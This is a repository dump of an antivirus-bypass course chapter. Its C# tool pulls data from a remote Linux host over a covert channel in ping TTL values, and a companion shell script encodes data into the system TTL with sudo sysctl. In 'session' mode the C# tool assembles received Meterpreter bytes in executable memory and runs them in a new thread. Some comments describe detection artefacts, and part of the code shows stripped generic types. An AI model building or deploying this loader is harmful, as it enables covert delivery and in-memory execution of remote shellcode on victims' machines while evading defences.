├── Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL ├── NativePayload_ICMP(WindowsLinux).png ├── NativePayload_ICMP.cs ├── NativePayload_ICMP.png ├── NativePayload_ICMP.sh ├── README.md ├── old_version │ ├── NativePayload_ICMP(old version).sh │ ├── README.md │ ├── finish.png │ ├── step 0.png │ ├── step 1.png │ ├── step 2.png │ └── step 3.png └── script(for test).sh ├── EBOOK ├── NativePayload_ICMP(WindowsLinux).png ├── NativePayload_ICMP.cs ├── NativePayload_ICMP.png ├── NativePayload_ICMP.sh ├── README.md ├── old_version │ ├── NativePayload_ICMP(old version).sh │ ├── README.md │ ├── finish.png │ ├── step 0.png │ ├── step 1.png │ ├── step 2.png │ └── step 3.png └── script(for test).sh ├── NativePayload_ICMP.cs └── README.md
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP(WindowsLinux).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP(WindowsLinux).png
--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.Data;
using System.Runtime.InteropServices;

namespace NativePayload_ICMP
{
    /// <summary>
    /// Chapter-10 tool of the "Bypassing Anti Viruses by C#.NET Programming" course: a covert
    /// channel that carries one hex digit per ICMP echo reply in the TTL field. The Linux sender
    /// (script.sh / NativePayload_ICMP.sh) sets net.ipv4.ip_default_ttl to 100..115 for each
    /// digit, 254 as start flag and 255 as finish flag; this side pings it in a loop and reads
    /// the TTL back. Modes: "sh"/"shtext" write the sender script, "listen" prints the received
    /// text, "session" copies the received bytes into executable memory and runs them.
    /// Artefacts a defender can look for, straight from the code below: one ping.exe child
    /// process (stdout redirected) per received digit, a steady one-ping-per-second stream to a
    /// single host, and in "session" mode a PAGE_EXECUTE_READWRITE VirtualAlloc followed by
    /// CreateThread into that region.
    /// </summary>
    class Program
    {
        // Hex string to transmit: raw hex from "sh", or the ASCII bytes of the text from "shtext".
        static string payload = "";
        // 16-row lookup Dec (0..15) -> Hex ("0".."9","a".."f"); filled in Main, used when decoding.
        public static DataTable Hex_Dec_Table;
        static string help = "\n" + "NativePayload_ICMP syntax :" + "\n\n"
            + "Syntax 1-1 : NativePayload_ICMP sh \"ffccab1cd01f0400 ....\" Input your meterpreter payload for create sh file" + "\n"
            + "Syntax 1-2 : NativePayload_ICMP session \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... Getting Meterpreter Session with Ping via TTL Values" + "\n"
            + "Syntax 2-1 : NativePayload_ICMP shtext \"your unicode text....\" Input your DATA/TEXT payload for create sh Script file" + "\n"
            + "Syntax 2-2 : NativePayload_ICMP listen \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... Dumping DATA/TEXT payload via TTL Values" + "\n"
            + "Syntax 3 : NativePayload_ICMP help" + "\n\n";

        /// <summary>
        /// Entry point. args[0] selects the mode (compared case-insensitively); args[1] is the hex
        /// payload ("sh"), the text ("shtext") or the sender's address ("listen", "session").
        /// Any exception - including a missing args[0] - is caught at the bottom and turned into
        /// a usage hint.
        /// </summary>
        /// <param name="args">Command-line arguments; see <see cref="help"/>.</param>
        static void Main(string[] args)
        {
            try
            {
                Hex_Dec_Table = new DataTable();

                Hex_Dec_Table.Columns.Add("Dec", typeof(int));
                Hex_Dec_Table.Columns.Add("Hex", typeof(string));

                // Rows 0..9 map to their own digit, 10..15 to "a".."f".
                for (int i = 0; i <= 15; i++)
                {
                    if (i <= 9)
                    {
                        Hex_Dec_Table.Rows.Add(i, i.ToString());
                    }
                    else if (i >= 10)
                    {
                        switch (i)
                        {
                            case 10:
                                {
                                    Hex_Dec_Table.Rows.Add(i, "a");
                                }
                                break;
                            case 11:
                                {
                                    Hex_Dec_Table.Rows.Add(i, "b");
                                }
                                break;
                            case 12:
                                {
                                    Hex_Dec_Table.Rows.Add(i, "c");
                                }
                                break;
                            case 13:
                                {
                                    Hex_Dec_Table.Rows.Add(i, "d");
                                }
                                break;
                            case 14:
                                {
                                    Hex_Dec_Table.Rows.Add(i, "e");
                                }
                                break;
                            case 15:
                                {
                                    Hex_Dec_Table.Rows.Add(i, "f");
                                }
                                break;
                            // default:
                        }
                    }
                }
                if (args[0].ToUpper() == "HELP")
                {
                    Console.WriteLine();
                    Console.ForegroundColor = ConsoleColor.DarkGray;
                    Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018");
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)");
                    Console.WriteLine();
                    Console.WriteLine(help);
                }
                else if (args[0].ToUpper() == "SH" || args[0].ToUpper() == "SHTEXT")
                {
                    // Sender-side script generation. The output is script.sh in the current directory.
                    Console.WriteLine();
                    Console.ForegroundColor = ConsoleColor.DarkGray;
                    Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018");
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)");
                    Console.WriteLine();
                    // payload is only filled when exactly two arguments were given; otherwise it
                    // stays "" and the script below is written with an empty TtlPayload.
                    if (args.Length == 2)
                    {
                        if (args[0].ToUpper() == "SH")
                        {
                            payload = args[1];
                        }
                        if(args[0].ToUpper() == "SHTEXT")
                        {
                            // Text is ASCII-encoded, two lowercase hex digits per byte.
                            try
                            {
                                byte[] Xbytes = ASCIIEncoding.ASCII.GetBytes(args[1]);
                                foreach (var item in Xbytes)
                                {
                                    payload += item.ToString("x2");
                                }
                            }
                            catch (Exception e)
                            {
                                Console.Write(e.Message);
                            }
                        }
                    }
                    string ff = "";
                    string lastone = "";
                    string TempPayload = "";
                    // One hex digit per iteration. _HextoDecimal returns the HexDic code plus a
                    // trailing space (e.g. "106 " for '6'); Substring(0, Length - 1) drops that space.
                    // A digit equal to the previous one is prefixed with "255": the receiver ignores a
                    // TTL equal to the last one it saw, so the 255 in between makes the repeat count.
                    // The "i != payload.Length" guard is always true inside this loop.
                    for (int i = 0; i < payload.Length;)
                    {
                        if (i != payload.Length)
                        {
                            ff = payload.Substring(i, 1);
                            string ss = _HextoDecimal(ff);
                            // debug only
                            //Console.WriteLine(ff + " " + ss);
                            ///Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 1 ;");
                            if (lastone != ss)
                            {
                                lastone = ss;
                                //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n");
                                TempPayload += ss.Substring(0, ss.Length - 1);
                            }
                            else
                            {
                                //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n");
                                //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n");
                                TempPayload += "255" + ss.Substring(0, ss.Length - 1);
                            }
                            //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n");
                            //Console.WriteLine();
                            i++;
                        }
                    }

                    // Sender script: TTL 254 as start flag, then "xxd -p -c 3" slices TtlPayload into
                    // 3-digit TTL values, each applied with sudo sysctl and a 2-second pause.
                    StringBuilder Mycode = new StringBuilder();
                    Mycode.AppendLine(" #!/bin/sh \n");
                    Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=254;\r");
                    Mycode.AppendLine("sleep 5;");
                    Mycode.AppendLine("TtlPayload=\"" + TempPayload + "\";");
                    Mycode.AppendLine(" for pay in `echo $TtlPayload | xxd -p -c 3`");
                    Mycode.AppendLine(" do ");
                    Mycode.AppendLine(" str=`echo $pay | xxd -r -p`");
                    Mycode.AppendLine(" if [ \"$str\" != $'' ];");
                    Mycode.AppendLine(" then ");
                    Mycode.AppendLine(" echo \"sudo sysctl net.ipv4.ip_default_ttl=\"$str \"; sleep 2;\"");
                    Mycode.AppendLine(" sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2;");
                    Mycode.AppendLine(" fi");
                    Mycode.AppendLine(" done");
                    if (args[0].ToUpper() == "SHTEXT")
                    {
                        // NOTE(review): each 255/100 pair is one '0' digit, so every iteration appends
                        // one 0x00 byte; this presumably pads the text to a multiple of 5 bytes so the
                        // LISTEN branch's 5-byte display buffer flushes - confirm against that branch.
                        for (int i = 0; i < 5 - args[1].Length % 5; i++)
                        {
                            if (args[1].Length % 5 == 0) break;
                            Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;");
                            Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;");
                            Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;");
                            Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;");
                        }

                        Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;");
                        Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;");
                    }

                    // Finish flag: the receiver stops after ten consecutive 255 replies.
                    Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255;");
                    Mycode.AppendLine("echo \"Done.\";");

                    Console.WriteLine("\n[!] File script.sh Created : \n");
                    Console.WriteLine(Mycode.ToString());
                    try
                    {
                        // CR characters are stripped before writing, presumably so the script runs
                        // unchanged under a Linux shell.
                        using (System.IO.FileStream Fs = new System.IO.FileStream("script.sh", System.IO.FileMode.Create, System.IO.FileAccess.Write, System.IO.FileShare.None))
                        {
                            using (System.IO.StreamWriter sw = new System.IO.StreamWriter(Fs))
                            {
                                sw.WriteLine(Mycode.ToString().Replace("\r", string.Empty));
                            }
                        }
                    }
                    catch (Exception omg)
                    {
                        Console.WriteLine(omg.Message);
                    }
                }
                else if (args[0].ToUpper() == "LISTEN")
                {
                    // Receiver for text. State: init becomes true once the 254 start flag is seen;
                    // flag_end after ten consecutive 255 replies; temp holds the previous TTL so a
                    // repeated value is taken only once (the sender puts a 255 between equal digits);
                    // 253 is ignored.
                    // NOTE(review): isDublicate, Last_ttl_str, two, start_time/end_time and Oonaggi
                    // are written but never read in this branch.
                    bool flag_end = false;
                    bool init = false;
                    int flag_end_count = 0;
                    int Payload_counter = 0;
                    string temp = "";
                    string start_time, end_time = "";
                    start_time = DateTime.Now.ToString();
                    string Oonaggi = "";
                    Console.WriteLine();
                    Console.ForegroundColor = ConsoleColor.DarkGray;
                    Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018");
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)");
                    Console.WriteLine();
                    Console.ForegroundColor = ConsoleColor.Yellow;
                    Console.WriteLine("[!] Listening Mode");
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine();
                    bool isDublicate = false;
                    string Last_ttl_str = "";
                    string TestStr = "";
                    int Timer_Time_Show_Bytes = 0;
                    int two = 0;
                    // Collected hex digits; every ten of them (five bytes) are decoded to ASCII and echoed.
                    string String_two_Bytes = "";
                    byte[] String_from_Bytes = new byte[5];
                    Console.WriteLine("{0} Dumping These Bytes: ", DateTime.Now.ToString());
                    String_two_Bytes = "";
                    while (true)
                    {
                        if (flag_end) break;
                        //// ping and send ICMP Traffic to attacker linux system to Dump payloads via TTL response ;)
                        string getcode = _Ping(args[1], 1);
                        // _Ping returns the last four characters of the "Reply ..." line; dropping the
                        // last one leaves the 3-digit TTL (presumably the trailing '\r', since _Ping
                        // splits on '\n' only - confirm). An empty result (no "Reply " line: no answer,
                        // or a localized ping output) makes Remove throw and ends the loop here.
                        try
                        {
                            getcode = getcode.Remove(getcode.Length - 1, 1);
                        }
                        catch (Exception e1)
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("e1 : " + e1.Message);
                            Console.WriteLine();
                            Console.WriteLine("Error : it is not good ;( ");
                            Console.WriteLine("Please run this tool again");
                            Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)");
                            Console.ForegroundColor = ConsoleColor.Gray;
                            break;
                        }

                        if (getcode == "254") { init = true; }
                        if (getcode == "255")
                        {
                            isDublicate = true;
                            Last_ttl_str = getcode;
                        }
                        if (getcode != "255")
                        {
                            Last_ttl_str = getcode;
                            // Any non-255 reply restarts the finish-flag count.
                            flag_end_count = 0;

                            if (getcode != temp && getcode != "255" && getcode != "253")
                            {
                                if (init && getcode != "254")
                                {
                                    if (Timer_Time_Show_Bytes == 10)
                                    {
                                        // Ten digits collected: parse five bytes and print them as text.
                                        Console.ForegroundColor = ConsoleColor.DarkCyan;
                                        int kk = 0;
                                        for (int i = 0; i < 5;)
                                        {
                                            String_from_Bytes[i] = byte.Parse(String_two_Bytes.Substring(kk, 2), System.Globalization.NumberStyles.HexNumber);
                                            kk++;
                                            kk++;
                                            i++;
                                        }

                                        Console.Write(" ==> " + ASCIIEncoding.ASCII.GetString(String_from_Bytes));
                                        Timer_Time_Show_Bytes = 0;
                                        String_two_Bytes = "";
                                        Console.WriteLine();
                                    }

                                    Console.ForegroundColor = ConsoleColor.Cyan;
                                    // TTL 100..115 -> last two digits "00".."15" -> table row -> hex digit.
                                    TestStr = getcode.Substring(getcode.Length - 2, 2);
                                    string Text = "";
                                    for (int j = 0; j <= 15; j++)
                                    {
                                        if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(TestStr))
                                        {

                                            Text = (Hex_Dec_Table.Rows[j].ItemArray[1].ToString());
                                            break;
                                        }
                                    }

                                    Console.Write("{0}", Text);
                                    String_two_Bytes += Text;

                                    Payload_counter++;
                                    Timer_Time_Show_Bytes++;
                                    two++;
                                }
                                else if (init == false)
                                {
                                    // Replies before the 254 start flag are ignored.
                                    // Console.ForegroundColor = ConsoleColor.DarkGreen;
                                    // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode);
                                }
                            }
                            else if (getcode == temp && getcode != "255")
                            {
                                // Same TTL as the previous reply: not a new digit.
                                // Console.ForegroundColor = ConsoleColor.DarkGreen;
                                // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode);
                            }

                            System.Threading.Thread.Sleep(1000);
                            temp = getcode;
                        }
                        else if (getcode == "255")
                        {
                            flag_end_count++;
                            Console.ForegroundColor = ConsoleColor.Gray;
                            // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode);

                            System.Threading.Thread.Sleep(500);
                            temp = getcode;
                            if (flag_end_count >= 10)
                            {
                                // Digits still sitting in String_two_Bytes (fewer than ten) are not printed.
                                flag_end = true;
                                Console.ForegroundColor = ConsoleColor.Gray;
                                Console.WriteLine();
                                Console.WriteLine("{0} Dumping Payloads Done.",DateTime.Now.ToString());
                            }
                        }
                    }
                }
                else if (args[0].ToUpper() == "SESSION")
                {
                    // Receiver for executable bytes: same protocol as LISTEN, but the digits are
                    // accumulated in Oonaggi and, after the finish flag, executed in this process.
                    bool flag_end = false;
                    bool init = false;
                    int flag_end_count = 0;
                    int Payload_counter = 0;
                    string temp = "";
                    string start_time, end_time = "";
                    start_time = DateTime.Now.ToString();
                    // Two characters per received digit ("00".."15"), i.e. four per byte.
                    string Oonaggi = "";
                    Console.WriteLine();
                    Console.ForegroundColor = ConsoleColor.DarkGray;
                    Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018");
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)");
                    Console.WriteLine();
                    Console.ForegroundColor = ConsoleColor.Yellow;
                    Console.WriteLine("[!] Meterpreter Session Mode");
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine();
                    bool isDublicate = false;
                    string Last_ttl_str = "";
                    while (true)
                    {
                        if (flag_end) break;
                        //// ping and sending ICMP Traffic to attacker linux system to Dump payloads by TTL response ;)
                        string getcode = _Ping(args[1], 1);
                        // Same trailing-character strip and failure exit as in LISTEN.
                        try
                        {
                            getcode = getcode.Remove(getcode.Length - 1, 1);
                        }
                        catch (Exception e1)
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("e1 : " + e1.Message);
                            Console.WriteLine();
                            Console.WriteLine("Error : it is not good ;( ");
                            Console.WriteLine("Please run this tool again");
                            Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)");
                            Console.ForegroundColor = ConsoleColor.Gray;
                            break;
                        }

                        if (getcode == "254") { init = true; }
                        if (getcode == "255")
                        {
                            isDublicate = true;
                            Last_ttl_str = getcode;
                        }
                        if (getcode != "255")
                        {
                            Last_ttl_str = getcode;
                            flag_end_count = 0;
                            if (getcode != temp && getcode != "255" && getcode != "253")
                            {
                                if (init && getcode != "254")
                                {
                                    Console.ForegroundColor = ConsoleColor.Green;
                                    Console.Write("{0} , Dump:{1},", DateTime.Now.ToString(), Payload_counter.ToString());
                                    Console.ForegroundColor = ConsoleColor.Cyan;
                                    //string dd = _HextoDecimal(getcode.Substring(1, 2));
                                    Console.Write(" DATA[{0}] ", getcode.Substring(getcode.Length - 2, 2));
                                    Oonaggi += getcode.Substring(getcode.Length - 2, 2);
                                    Console.ForegroundColor = ConsoleColor.Green;
                                    Console.WriteLine("from {0} final: {1}", args[1], getcode);
                                    Payload_counter++;
                                }
                                else if (init == false)
                                {
                                    Console.ForegroundColor = ConsoleColor.DarkGreen;
                                    Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode);
                                }
                            }
                            else if (getcode == temp && getcode != "255")
                            {
                                Console.ForegroundColor = ConsoleColor.DarkGreen;
                                Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode);
                            }

                            System.Threading.Thread.Sleep(1000);
                            temp = getcode;
                        }
                        else if (getcode == "255")
                        {
                            flag_end_count++;
                            Console.ForegroundColor = ConsoleColor.DarkGreen;
                            Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode);

                            System.Threading.Thread.Sleep(500);
                            temp = getcode;
                            if (flag_end_count >= 10) { flag_end = true; }
                        }
                    }

                    end_time = DateTime.Now.ToString();

                    Console.WriteLine(end_time + " , Done ");

                    // Decode: each 2-character pair is mapped back to a hex digit through the table,
                    // and every two digits become one byte. A trailing incomplete byte is dropped by
                    // the integer division. Nothing validates or authenticates what was received.
                    byte[] __Bytes = new byte[Oonaggi.Length / 4];
                    int payload_dec_count = Oonaggi.Length / 4;
                    int tmp_counter = 0;
                    string current = null;
                    int _0_to_2_ = 0;
                    for (int d = 0; d < payload_dec_count;)
                    {
                        string tmp1_current = (Oonaggi.Substring(tmp_counter, 2));

                        for (int j = 0; j <= 15; j++)
                        {
                            if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(tmp1_current))
                            {
                                _0_to_2_++;

                                current += (Hex_Dec_Table.Rows[j].ItemArray[1].ToString());

                                if (_0_to_2_ == 2)
                                {
                                    Console.Write(current + " ");
                                    __Bytes[d] = Convert.ToByte(current, 16);
                                    _0_to_2_ = 0;
                                    d++;
                                    current = null;
                                }
                            }
                        }

                        tmp_counter++;
                        tmp_counter++;

                    }
                    Console.WriteLine();
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine("Bingo Meterpreter session by ICMPv4 traffic ;)");
                    // In-memory execution of the received bytes: RWX allocation, copy, new thread,
                    // then wait on it indefinitely. For detection this is the classic pattern of an
                    // unbacked PAGE_EXECUTE_READWRITE region followed by CreateThread into it.
                    UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                    Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length);
                    IntPtr hThread = IntPtr.Zero;
                    UInt32 threadId = 0;
                    IntPtr pinfo = IntPtr.Zero;

                    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                    WaitForSingleObject(hThread, 0xFFFFFFFF);

                }
            }
            catch (Exception _main)
            {
                Console.WriteLine("Main Error: {0}", _main.Message);
                // The format string below has no placeholder, so _main.Message is never printed here.
                Console.WriteLine("Main Error: Please use help , NativePayload_ICMP help", _main.Message);
            }
        }


        // Hex digit -> TTL code used on the wire (100..115). The commented-out table is an
        // alternative 200..215 range.
        // NOTE(review): the generic arguments appear to have been stripped during extraction
        // (the dictionary is indexed by char and holds ints) - presumably Dictionary<char, int>;
        // confirm against the upstream file.
        static Dictionary HexDic = new Dictionary
        {
            //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208}
            //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215}

            {'0',100},{'1',101},{'2',102},{'3',103},{'4',104},{'5',105},{'6',106},{'7',107},{'8',108}
            ,{'9',109},{'a',110},{'b',111},{'c',112},{'d',113},{'e',114},{'f',115}
        };

        /// <summary>
        /// Maps each hex digit of <paramref name="hexstring"/> to its TTL code from
        /// <see cref="HexDic"/> multiplied by 16^position (least significant digit first), each
        /// followed by a space. The only caller passes a single character, so the result is the
        /// HexDic value plus one trailing space (e.g. "106 " for "6").
        /// </summary>
        /// <param name="hexstring">Hex digits; upper case is accepted (lower-cased first).</param>
        /// <returns>Space-terminated decimal codes, one per digit.</returns>
        /// <exception cref="KeyNotFoundException">A character is not a hex digit.</exception>
        static string _HextoDecimal(string hexstring)
        {

            string result = "";
            hexstring = hexstring.ToLower();
            for (int i = 0; i < hexstring.Length; i++)
            {
                char Oonagii = hexstring[hexstring.Length - 1 - i];
                result += (HexDic[Oonagii] * (int)Math.Pow(16, i)).ToString() + " ";
            }
            return result;
        }


        /// <summary>
        /// Runs ping.exe once against <paramref name="IPAddress_DNSName"/> and returns the last
        /// four characters of the last output line that starts with "Reply " (the TTL digits plus
        /// whatever follows them on that line). Returns "" when no such line exists or when
        /// starting/reading the process throws; the exception is only printed.
        /// </summary>
        /// <param name="IPAddress_DNSName">Host to ping; appended to the command line unquoted.</param>
        /// <param name="counter">Ignored: always forced to 1 request.</param>
        /// <returns>Four-character tail of the reply line, or "".</returns>
        static string _Ping(string IPAddress_DNSName, int counter)
        {
            string Final_Dec = "";

            try
            {

                if (counter != 1) { counter = 1; }

                /// Make ICMPv4 traffic for getting Meterpreter Payloads by Ping
                // One hidden ping.exe child per call, stdout captured; this is the per-digit
                // process-creation event a defender would see.
                ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("ping.exe", IPAddress_DNSName + " -n " + counter.ToString());
                ns_Prcs_info.RedirectStandardInput = true;
                ns_Prcs_info.RedirectStandardOutput = true;
                ns_Prcs_info.UseShellExecute = false;


                Process myPing = new Process();
                myPing.StartInfo = ns_Prcs_info;
                myPing.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                myPing.Start();

                //string result_Line0 = "";
                string Pingoutput = myPing.StandardOutput.ReadToEnd();
                // Split on '\n' (and tabs) only, so a '\r' stays at the end of each line.
                string[] All_lines = Pingoutput.Split('\t', '\n');

                //int PayloadLines_current_id = 0;
                // Relies on the English "Reply from ..." wording of ping.exe.
                foreach (var item in All_lines)
                {
                    if (item.StartsWith("Reply "))
                    {
                        Final_Dec = item.Substring(item.Length - 4);
                    }
                    // debug
                    // Console.WriteLine(item + "\n"+ s);
                }

            }
            catch (Exception e)
            {

                Console.WriteLine(e.Message);
            }
            return Final_Dec;
        }

        public static UInt32 MEM_COMMIT = 0x1000;
        public static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        // Addresses are passed as UInt32 in these signatures - presumably 32-bit-process only.
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
    }
}

--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.png
--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Linux side of the chapter-10 TTL covert channel.
#   shtext "<text>" : encode the text as hex digits and, for each digit, set
#                     net.ipv4.ip_default_ttl to 100..115 with sudo sysctl
#                     (254 = start flag, 253 = "same digit again", 255 = finish flag).
#   listen <ipv4>   : ping the sender once per second and rebuild the text from the
#                     TTL of each reply; stops once the 255 counter reaches 15.
# Every TTL change is a sudo sysctl write, so the sender side shows up in sudo/audit logs.
# NOTE(review): despite the #!/bin/sh line the script relies on bash features
# (==, +=, $'...', (( ))); run it with bash.
payload="";
PingRequest=0;
c=1;
temp="";
tput setaf 7;
echo
echo "NativePayload_ICMP.sh Download Payload by ICMPv4 Traffic via 'TTL' ";
echo "NativePayload_ICMP v1.0 , Published by Damon Mohammadbagher 2017-2018 ";
tput setaf 9;
if [ "$1" == $'help' ] ;
then
echo
echo "step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext \"your text or string\"";
echo "step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen \"w.x.y.z\"";
echo "Note: in step1 you should use Client-side system w.x.y.z IPv4Address";
echo
fi

if [ "$1" == $'shtext' ] ;
then
#textpayload=`echo $2$'\157' | xxd -p`
# Space-separated hex bytes of the text (od -t x1).
textpayload=`echo -n $2 | od -A n -t x1`
ttlpayload="";
mytemp="";
echo
echo "[!] your payload Text:" $2;
echo "[!] your payload bytes:" $textpayload;
# xxd -c 1 dumps one byte per line; the loop sees every word of that dump (offset, hex
# pair, ASCII character) and only the single-character ASCII column matches a case below,
# which appears to be the intended trick. mytemp tracks the previous word rather than the
# previous digit, so the duplicate check here seldom triggers; the 253 pass further down
# is what handles repeated digits.
for pay in `echo $textpayload | xxd -c 1`
do
case $pay in
0)
if [ "$mytemp" != $'0' ] ;
then
ttlpayload+="100"
fi
;;
1)
if [ "$mytemp" != $'1' ] ;
then
ttlpayload+="101"
fi
;;
2)
if [ "$mytemp" != $'2' ] ;
then
ttlpayload+="102"
fi
;;
3)
if [ "$mytemp" != $'3' ] ;
then
ttlpayload+="103"
fi
;;
4)
if [ "$mytemp" != $'4' ] ;
then
ttlpayload+="104"
fi
;;
5)
if [ "$mytemp" != $'5' ] ;
then
ttlpayload+="105"
fi
;;
6)
if [ "$mytemp" != $'6' ] ;
then
ttlpayload+="106"
fi
;;
7)
if [ "$mytemp" != $'7' ] ;
then
ttlpayload+="107"
fi
;;
8)
if [ "$mytemp" != $'8' ] ;
then
ttlpayload+="108"
fi
;;
9)
if [ "$mytemp" != $'9' ] ;
then
ttlpayload+="109"
fi
;;
a)
if [ "$mytemp" != $'a' ] ;
then
ttlpayload+="110"
fi
;;
b)
if [ "$mytemp" != $'b' ] ;
then
ttlpayload+="111"
fi
;;
c)
if [ "$mytemp" != $'c' ] ;
then
ttlpayload+="112"
fi
;;
d)
if [ "$mytemp" != $'d' ] ;
then
ttlpayload+="113"
fi
;;
e)
if [ "$mytemp" != $'e' ] ;
then
ttlpayload+="114"
fi
;;
f)
if [ "$mytemp" != $'f' ] ;
then
ttlpayload+="115"
fi
;;
esac
mytemp=$pay;
done
#echo $ttlpayload;
# Split the TTL string into 3-digit values; a value equal to the previous one is prefixed
# with 253 so the receiver, which ignores a repeat of the last TTL, still records it.
mytemp2="";
Finalttlpayload="";
for pay2 in `echo $ttlpayload | xxd -g 0 -c 3 | awk {'print $3'}`
do
if [ "$mytemp2" == "$pay2" ]
then
Finalttlpayload+="253""$pay2";
fi
if [ "$mytemp2" != "$pay2" ]
then
Finalttlpayload+=$pay2;
fi
mytemp2=$pay2
done
echo

#echo "your TTL payload:" $Finalttlpayload

# Finalttlpayload=`echo "${Finalttlpayload::-6}"`;
# Number of 3-digit TTL values = number of sysctl writes still to come.
mylength=`echo ${#Finalttlpayload}`
div=3;
length=$((mylength / div));

echo "[!] your TTL payload:" $Finalttlpayload;
tput setaf 3;
echo "[!] at least you need ("$length") Times to change TTL value";
echo "[!] at least you need ("$length "* 2) Ping Request/Response";
tput setaf 9;
echo "[>] Start Flag , change TTL value to '254' with sleep 5)";
sudo sysctl net.ipv4.ip_default_ttl=254; sleep 5;
echo "[>] Running sysctl command for change TTL values (Default sleep is 2)";
echo

# One sudo sysctl write per 3-digit slice, 2 s apart. The "." test presumably skips the
# slice that only holds echo's trailing newline when the length is not a multiple of 3 - confirm.
